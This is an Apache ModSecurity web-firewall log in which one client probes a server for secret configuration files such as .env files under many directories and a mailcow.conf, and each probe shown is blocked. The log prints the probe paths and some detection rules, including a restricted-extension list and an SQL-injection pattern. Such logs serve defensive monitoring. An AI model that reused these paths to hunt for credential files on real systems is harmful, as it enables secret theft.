[Mon May 11 20:55:53.419532 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/new/.env"] [unique_id "agImOfjVc-A-CSptvm1xQgAAAEs"]
[Mon May 11 20:55:53.419716 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/new/.env"] [unique_id "agImOfjVc-A-CSptvm1xQgAAAEs"]
[Mon May 11 20:55:53.473574 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/backend/.env"] [unique_id "agImOZYn-x0CHsbEbP2tcgAAAI8"]
[Mon May 11 20:55:53.473781 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/backend/.env"] [unique_id "agImOZYn-x0CHsbEbP2tcgAAAI8"]
[Mon May 11 20:55:53.474001 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/backend/.env"] [unique_id "agImOZYn-x0CHsbEbP2tcgAAAI8"]
[Mon May 11 20:55:53.534369 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agImOVNddpkriGUb6ZV2mAAAAQw"]
[Mon May 11 20:55:53.534535 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agImOVNddpkriGUb6ZV2mAAAAQw"]
[Mon May 11 20:55:53.534731 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agImOVNddpkriGUb6ZV2mAAAAQw"]
[Mon May 11 20:55:53.553080 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agImOVNddpkriGUb6ZV2mQAAAQw"]
[Mon May 11 20:55:53.553323 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agImOVNddpkriGUb6ZV2mQAAAQw"]
[Mon May 11 20:55:53.553498 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agImOVNddpkriGUb6ZV2mQAAAQw"]
[Mon May 11 20:55:53.579633 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node-api/.env"] [unique_id "agImOVNddpkriGUb6ZV2mgAAAQw"]
[Mon May 11 20:55:53.579791 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node-api/.env"] [unique_id "agImOVNddpkriGUb6ZV2mgAAAQw"]
[Mon May 11 20:55:53.579986 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node-api/.env"] [unique_id "agImOVNddpkriGUb6ZV2mgAAAQw"]
[Mon May 11 20:55:53.588317 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agImOZYn-x0CHsbEbP2tdAAAAIg"]
[Mon May 11 20:55:53.588472 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agImOZYn-x0CHsbEbP2tdAAAAIg"]
[Mon May 11 20:55:53.588659 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agImOZYn-x0CHsbEbP2tdAAAAIg"]
[Mon May 11 20:55:53.630294 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nodeapi/.env"] [unique_id "agImOTP5Q_-MBliRCAxnIgAAABI"]
[Mon May 11 20:55:53.630450 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nodeapi/.env"] [unique_id "agImOTP5Q_-MBliRCAxnIgAAABI"]
[Mon May 11 20:55:53.630636 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nodeapi/.env"] [unique_id "agImOTP5Q_-MBliRCAxnIgAAABI"]
[Mon May 11 20:55:53.644508 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeweb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nodeweb/.env"] [unique_id "agImOTP5Q_-MBliRCAxnIwAAABM"]
[Mon May 11 20:55:53.644657 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nodeweb/.env"] [unique_id "agImOTP5Q_-MBliRCAxnIwAAABM"]
[Mon May 11 20:55:53.644838 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nodeweb/.env"] [unique_id "agImOTP5Q_-MBliRCAxnIwAAABM"]
[Mon May 11 20:55:53.682853 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agImOZYn-x0CHsbEbP2tdgAAAI8"]
[Mon May 11 20:55:53.683070 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agImOZYn-x0CHsbEbP2tdgAAAI8"]
[Mon May 11 20:55:53.683311 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agImOZYn-x0CHsbEbP2tdgAAAI8"]
[Mon May 11 20:55:53.758363 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/api/.env"] [unique_id "agImOfjVc-A-CSptvm1xRwAAAEs"]
[Mon May 11 20:55:53.758516 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/api/.env"] [unique_id "agImOfjVc-A-CSptvm1xRwAAAEs"]
[Mon May 11 20:55:53.758698 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/api/.env"] [unique_id "agImOfjVc-A-CSptvm1xRwAAAEs"]
[Mon May 11 20:55:53.767770 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\b)|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+(?:(?:group_)concat|char|load ..." at ARGS_NAMES:*update*. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "81"] [id "942360"] [rev "2"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "conge.tct-telecom.fr"] [uri "/package-updates/*"] [unique_id "agImOfjVc-A-CSptvm1xSAAAAEg"]
[Mon May 11 20:55:53.767850 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/package-updates/*"] [unique_id "agImOfjVc-A-CSptvm1xSAAAAEg"]
[Mon May 11 20:55:53.768080 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Detects concatenated basic SQL injection and SQLLFI attempts"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/package-updates/*"] [unique_id "agImOfjVc-A-CSptvm1xSAAAAEg"]
[Mon May 11 20:55:53.897788 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agImOTP5Q_-MBliRCAxnJwAAAAo"]
[Mon May 11 20:55:53.897971 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agImOTP5Q_-MBliRCAxnJwAAAAo"]
[Mon May 11 20:55:53.898171 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agImOTP5Q_-MBliRCAxnJwAAAAo"]
[Mon May 11 20:55:53.923035 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfAAAAI8"]
[Mon May 11 20:55:53.923195 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfAAAAI8"]
[Mon May 11 20:55:53.923374 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfAAAAI8"]
